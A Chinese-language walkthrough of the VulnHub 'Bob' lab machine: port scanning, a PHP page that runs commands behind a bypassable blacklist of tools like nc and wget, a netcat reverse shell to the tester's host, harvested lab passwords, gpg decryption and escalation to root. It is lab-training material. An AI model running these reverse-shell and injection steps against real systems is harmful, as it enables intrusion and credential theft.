Bob:1.0.1
下载链接
https://download.vulnhub.com/bob/Bob_v1.0.1.ova
将靶机ova文件导入vmware中,更改网卡配置为桥接直接使用。
1.信息收集
根据已知靶机mac地址查询ip。
确定目标IP
Nmap -sP 192.168.43.0/24
端口扫描
Nmap 192.168.43.169 -A -p- -oN namp.A
C:\Users\ASUS>Nmap 192.168.43.169 -A -p- -oN nmap.A
Starting Nmap 7.70 ( https://nmap.org ) at 2020-09-26 10:25 ?D1ú±ê×?ê±??
Nmap scan report for Milburg-High (192.168.43.169)
Host is up (0.00069s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5b
80/tcp open http Apache httpd 2.4.25 ((Debian))
| http-robots.txt: 4 disallowed entries
| /login.php /dev_shell.php /lat_memo.html
|_/passwords.html
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Site doesn't have a title (text/html).
25468/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u2 (protocol 2.0)
| ssh-hostkey:
| 2048 84:f2:f8:e5:ed:3e:14:f3:93:d4:1e:4c:41:3b:a2:a9 (RSA)
| 256 5b:98:c7:4f:84:6e:fd:56:6a:35:16:83:aa:9c:ea:f8 (ECDSA)
|_ 256 39:16:56:fb:4e:0f:50:85:40:d3:53:22:41:43:38:15 (ED25519)
MAC Address: 00:0C:29:FE:B2:D1 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.69 ms Milburg-High (192.168.43.169)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.80 seconds
2.网站信息
御剑后台扫描
login.html后台登陆界面
好像不能使用了
/index.html站点主页
robots文件暴漏的目录尝试访问
发现/dev_shell.php可以执行部分命令
3.对站点渗透测试
burp抓包查看
发现过滤了一些命令
尝试绕过
可以调用/bin下的命令解释器进行运行命令
查看目录中的敏感文件
dev_shell.php
<?php
system("running command...");
//executes system Command
//checks for sneaky ;
if (strpos($command, ';') !==false){
system("echo Nice try skid, but you will never get through this bulletproof php code"); //doesn't work :P
}
else{
$is_he_a_bad_man = explode(' ', trim($command));
//checks for dangerous commands
if (in_array($is_he_a_bad_man[0], $bad_words)){
system("echo Get out skid lol");
}
else{
system($_POST['in_command']);
}
}
?>
dev_shell.php.bak
<?php
//init
$invalid = 0;
$command = ($_POST['in_command']);
$bad_words = array("pwd", "ls", "netcat", "ssh", "wget", "ping", "traceroute", "cat", "nc");
?>
<?php
system("running command...");
//executes system Command
//checks for sneaky ;
if (strpos($command, ';') !==false){
system("echo Nice try skid, but you will never get through this bulletproof php code"); //doesn't work :P
}
else{
$is_he_a_bad_man = explode(' ', trim($command));
//checks for dangerous commands
if (in_array($is_he_a_bad_man[0], $bad_words)){
system("echo Get out skid lol");
}
else{
system($_POST['in_command']);
}
}
?>
根据PHP代码看出
$bad_words = array("pwd", "ls", "netcat", "ssh", "wget", "ping", "traceroute", "cat", "nc"
if (in_array($is_he_a_bad_man[0], $bad_words)){
system("echo Get out skid lol");
}
else{
system($_POST['in_command']);
}
采用黑名单过滤
pwd
ls
netcat
ssh
wget
ping
traceroute
cat
nc
4.权限提升
进行nc命令反弹shell
本机创建监听
nc -lvnp 2222
bp进行命令执行反弹shell
/bin/nc -e /bin/bash 192.168.43.193 2222
进入交互式shell
python -c 'import pty;pty.spawn("/bin/bash")'
5.信息挖掘
根目录发现flag文件,但没有读写权限。
bob家目录发现敏感文件
cat .old_passwordfile.html
<html>
<p>
jc:Qwerty
seb:T1tanium_Pa$$word_Hack3rs_Fear_M3
</p>
</html>
jc的密码为 Qwerty
gpg文件
尝试解密gpg文件(没有密钥不能进行解密)
发现密钥文件(这个我也没想到密钥是藏头诗)
HARPOCRATES
6.提权
登陆jc用户
解密gpg文件
根据之前得到的密钥HARPOCRATES
得到bob密码 b0bcat_
登陆bob
登陆root
密码为bob密码
b0bcat_
查看flag